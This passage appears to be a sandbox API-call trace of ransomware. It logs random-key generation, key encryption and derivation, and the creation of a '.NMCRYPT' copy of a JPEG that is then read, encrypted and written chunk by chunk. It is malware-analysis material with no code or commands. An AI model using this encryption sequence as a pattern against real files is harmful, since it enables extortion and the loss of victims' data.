dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.076] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.077] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.077] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.078] CryptCreateHash (in: hProv=0x8e3770, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0163.078] CryptHashData (hHash=0x9ad278, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.078] CryptDeriveKey (in: hProv=0x8e3770, Algid=0x6610, hBaseData=0x9ad278, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad338) returned 1 [0163.078] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0163.078] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0163.078] wcslen (_String="\\\\?\\") returned 0x4 [0163.078] CryptDuplicateKey (in: hKey=0x9ad338, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad2f8) returned 1 [0163.078] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0163.078] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0163.079] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=23871) returned 1 [0163.079] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0163.079] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.080] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.081] GetLastError () returned 0x0 [0163.081] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.081] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.081] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.082] GetLastError () returned 0x0 [0163.082] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.082] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.082] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.082] GetLastError () returned 0x0 [0163.082] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.082] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.082] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.082] GetLastError () returned 0x0 [0163.082] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.082] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.082] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.082] GetLastError () returned 0x0 [0163.082] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.082] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.082] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.082] GetLastError () returned 0x0 [0163.082] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.082] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.082] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.082] GetLastError () returned 0x0 [0163.082] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.082] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.082] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.082] GetLastError () returned 0x0 [0163.082] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.083] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.083] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.083] GetLastError () returned 0x0 [0163.083] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.083] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.083] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.083] GetLastError () returned 0x0 [0163.083] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.083] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.083] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.083] GetLastError () returned 0x0 [0163.083] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.083] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.083] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.083] GetLastError () returned 0x0 [0163.083] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.083] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.083] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.083] GetLastError () returned 0x0 [0163.083] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.083] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.083] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.083] GetLastError () returned 0x0 [0163.083] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.083] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.084] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.084] GetLastError () returned 0x0 [0163.084] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.084] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.084] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.084] GetLastError () returned 0x0 [0163.084] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.084] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.084] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.084] GetLastError () returned 0x0 [0163.084] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.084] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.084] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.084] GetLastError () returned 0x0 [0163.084] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.084] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.084] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.084] GetLastError () returned 0x0 [0163.084] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.084] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.084] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.084] GetLastError () returned 0x0 [0163.084] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.084] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.085] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.085] GetLastError () returned 0x0 [0163.085] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.085] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.085] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.085] GetLastError () returned 0x0 [0163.085] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.085] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, 